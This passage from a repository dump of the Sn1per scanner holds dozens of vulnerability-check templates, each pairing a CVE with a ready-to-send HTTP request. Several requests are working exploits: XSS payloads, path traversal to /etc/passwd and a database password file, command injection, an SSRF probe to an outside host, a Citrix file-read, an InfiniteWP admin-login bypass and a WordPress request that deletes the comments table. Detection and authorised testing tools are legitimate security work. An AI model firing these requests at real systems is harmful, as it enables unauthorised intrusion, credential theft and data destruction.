AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2140 - Jenkin AuditTrailPlugin XSS' 3 | URI="/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s --insecure -L " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-24223 - Mara CMS 7.5 Reflective XSS' 3 | URI='/contact.php?theme=%3Csvg/onload=alert(1337)%3E' 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-25213_-_WP_File_Manager_File_Upload.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-25213 - WP File Manager File Upload' 3 | URI="/wp-content/plugins/wp-file-manager/readme.txt" 4 | METHOD='GET' 5 | MATCH="(Stable\stag\:\s[0-6]\.[0-8])" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-2551_-_Unauthenticated_Oracle_WebLogic_Server_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution' 3 | URI='/console/login/LoginForm.jsp' 4 | METHOD='GET' 5 | MATCH="10\.3\.6\.0|12\.1\.3\.0|12\.2\.1\.3|12\.2\.1\.4" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2555 - WebLogic Server Deserialization RCE' 3 | URI="/console/login/LoginForm.jsp" 4 | METHOD='GET' 5 | MATCH="WebLogic" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-3187_-_Citrix_Unauthenticated_File_Deletion.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-3187 - Citrix Unauthenticated File Deletion' 3 | URI="/+CSCOE+/session_password.html" 4 | METHOD='GET' 5 | MATCH="webvpn" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-3452_-_Cisco_ASA-FTD_Arbitrary_File_Reading_Vulnerability.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-3452 - Cisco ASA/FTD Arbitrary File Reading Vulnerability' 3 | URI='/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../' 4 | METHOD='GET' 5 | MATCH="INTERNAL_PASSWORD_ENABLED|CONF_VIRTUAL_KEYBOARD" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5284 - Next JS Limited Path Traversal' 3 | URI="/_next/static/../server/pages-manifest.json" 4 | METHOD='GET' 5 | MATCH='\{\"/_app\":\".*?_app\.js\"' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 1' 3 | URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd" 4 | METHOD='GET' 5 | MATCH="root:*:|nameserver|\[extensions\]" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2' 3 | URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/resolv.conf" 4 | METHOD='GET' 5 | MATCH="root:*:|nameserver|\[extensions\]" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2' 3 | URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../Windows/win.ini" 4 | METHOD='GET' 5 | MATCH="root:*:|nameserver|\[extensions\]" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-5412_-_Full-read_SSRF_in_Spring_Cloud_Netflix.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix' 3 | URI="/proxy.stream?origin=http://burpcollaborator.net/" 4 | METHOD='GET' 5 | MATCH="Burp\ Collaborator\ Server" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 1' 3 | URI='/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp' 4 | METHOD='GET' 5 | MATCH='divGeneralRemoteSettingsTable' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2' 3 | URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-5902_-_F5_BIG-IP_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5902 - F5 BIG-IP XSS' 3 | URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=%3Csvg/onload=alert(1337)%3E' 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-7048_-_WP_Database_Reset_3.15_Unauthenticated_Database_Reset.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-7048 - WP Database Reset 3.15 Unauthenticated Database Reset' 3 | URI='/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111' 4 | METHOD='GET' 5 | MATCH='X-Redirect-By\:\ WordPress' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -I" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-7209_-_LinuxKI_Toolset_6.01_Remote_Command_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-7209 - LinuxKI Toolset 6.01 Remote Command Execution' 3 | URI="/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d" 4 | METHOD='GET' 5 | MATCH='nonexistent' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-7246 - qdPM Authenticated Remote Code Execution' 3 | URI="/" 4 | METHOD='GET' 5 | MATCH='qdPM 9.' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-7473 Citrix ShareFile StorageZones Unauthenticated Access' 3 | URI="/UploadTest.aspx" 4 | METHOD='GET' 5 | MATCH="content\-length\:\ 0" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-L -I --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.py: -------------------------------------------------------------------------------- 1 | # Import any WebDriver class that you would usually import from 2 | # selenium.webdriver from the seleniumrequests module 3 | import sys 4 | from seleniumrequests import Firefox 5 | 6 | url = sys.argv[1] 7 | # Simple usage with built-in WebDrivers: 8 | webdriver = Firefox() 9 | response = webdriver.request('GET', '%s/www/delivery/afr.php?refresh=10000&")\',10000000);document.write(1+1336);setTimeout(\'alert("' % url) 10 | if '1337' in response.text: 11 | print("Vulnerable!") 12 | webdriver.quit() -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8115 - Revive Adserver XSS' 3 | URI="/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" 4 | METHOD='GET' 5 | MATCH="\);alert\(1\);setTimeout\('alert\(\"&loc='" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8163_-_Rails_5.0.1_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8163 - Rails < 5.0.1 Remote Code Execution' 3 | URI='/?system(%27echo+$((1%2B1787568))%27)%3ba%23' 4 | METHOD='GET' 5 | MATCH="1787569" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8191_-_Citrix_ADC_NetScaler_Gateway_Reflected_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8191 - Citrix ADC & NetScaler Gateway Reflected XSS' 3 | URI="/menu/stapp" 4 | METHOD='POST' 5 | MATCH="" 6 | SEVERITY='P1 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6' --data 'sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot'" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8193_-_Citrix_Unauthenticated_LFI.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8193 - Citrix Unauthenticated LFI' 3 | URI="/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1" 4 | METHOD='POST' 5 | MATCH="SESSID" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Content-Type: application/xml' -H 'X-NITRO-USER: xpyZxwy6' -H 'X-NITRO-PASS: xWXHUJ56' -I --data ''" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8194_-_Citrix_ADC_NetScaler_Gateway_Reflected_Code_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection' 3 | URI="/menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8209_-_Citrix_XenMobile_Server_Path_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8209 - Citrix XenMobile Server Path Traversal' 3 | URI="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Config_Password_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure' 3 | URI='/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties' 4 | METHOD='GET' 5 | MATCH="database\.password" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Path_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal' 3 | URI='/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8512_-_IceWarp_WebMail_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8512 - IceWarp WebMail XSS' 3 | URI="/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8772_-_IfiniteWP_Client_1.9.4.5_Authentication_Bypass_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8772 - InfiniteWP Client 1.9.4.5 - Authentication Bypass 1' 3 | URI='/wp-admin/' 4 | METHOD='POST' 5 | MATCH="IWPHEADER" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' --data '_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ=='" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-8982_-_Citrix_ShareFile_StorageZones_Unauthenticated_Arbitrary_File_Read.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read' 3 | URI="/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri" 4 | METHOD='GET' 5 | MATCH="bit\ app\ support" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s --insecure " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-9047_-_exacqVision_Web_Service_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-9047 - exacqVision Web Service Remote Code Execution' 3 | URI="/version.web" 4 | METHOD='GET' 5 | MATCH="3\.10\.4\.72058|3\.12\.4\.76544|3\.8\.2\.67295|7\.0\.2\.81005|7\.2\.7\.86974|7\.4\.3\.89785|7\.6\.4\.94391|7\.8\.2\.97826|8\.0\.6\.105408|8\.2\.2\.107285|8\.4\.3\.111614|8\.6\.3\.116175|8\.8\.1\.118913|9\.0\.3\.124620|9\.2\.0\.127940|9\.4\.3\.137684|9\.6\.7\.145949|9\.8\.4\.149166|19\.03\.3\.152166|19\.06\.4\.157118|19\.09\.4\.0|19\.12\.2\.0|20\.03\.2\.0|20\.06\.3\.0" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-9054 - ZyXEL NAS Remote Code Execution' 3 | URI="/cgi-bin/weblogin.cgi?username=admin';echo \$((1+1787568))" 4 | METHOD='GET' 5 | MATCH="1787569" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-9484_-_Apache_Tomcat_RCE_by_deserialization.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-9484 - Apache Tomcat RCE by deserialization' 3 | URI="/index.jsp" 4 | METHOD='GET' 5 | MATCH='ObjectInputStream|PersistentManagerBase' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-9757_-_SEOmatic_3.3.0_Server-Side_Template_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection' 3 | URI="/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" 4 | METHOD='GET' 5 | MATCH="22344" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Cisco_VPN_Login_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Cisco VPN Login Detected' 3 | URI='/+CSCOE+/logon.html' 4 | METHOD='GET' 5 | MATCH="CSCO_Format" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Cisco_VPN_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Cisco VPN Detected' 3 | URI='/+CSCOE+/win.js' 4 | METHOD='GET' 5 | MATCH="CSCO_WebVPN" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Citrix-Access-Gateway_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Citrix-Access-Gateway Detected' 3 | URI='/vpn/index.html' 4 | METHOD='GET' 5 | MATCH='Netscaler Gateway' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Citrix_VPN_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Citrix VPN Detected' 3 | URI='/vpn/index.html' 4 | METHOD='GET' 5 | MATCH="Netscaler\ Gateway" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Citrix_VPN_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Citrix VPN Detected 2' 3 | URI='/vpn/index.html' 4 | METHOD='GET' 5 | MATCH="NetScaler " 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Clear-text_Communications_HTTP.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Clear-Text Protocol - HTTP' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='200 OK' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Clickjacking.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Clickjacking' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='X-Frame-Options' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -I" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 10 | SEARCH="negative" -------------------------------------------------------------------------------- /Sn1per/templates/active/Common_Status_File_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Common Status File Detected 1' 3 | URI='/.perf' 4 | METHOD='GET' 5 | MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Common_Status_File_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Common Status File Detected 2' 3 | URI='/server-status' 4 | METHOD='GET' 5 | MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Common_Status_File_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Common Status File Detected 3' 3 | URI='/status.html' 4 | METHOD='GET' 5 | MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Confluence_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Atlassian Confluence Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="Atlassian\ Confluence" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Contact_Form_7_Wordpress_Plugin_Found_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Contact Form 7 Wordpress Plugin Found 1' 3 | URI="/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt" 4 | METHOD='GET' 5 | MATCH="Contact\ Form\ 7" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Contact_Form_7_Wordpress_Plugin_Found_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Contact Form 7 Wordpress Plugin Found 2' 3 | URI="/wordpress/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt" 4 | METHOD='GET' 5 | MATCH="Contact\ Form\ 7" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Directory_Listing_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Directory Listing Enabled' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="Index\ of|To\ Parent\ Directory" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Drupal_Install_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Install Found' 3 | URI='/install.php?profile=default' 4 | METHOD='GET' 5 | MATCH='Choose language | Drupal' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Drupal_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Detected 1' 3 | URI='/' 4 | 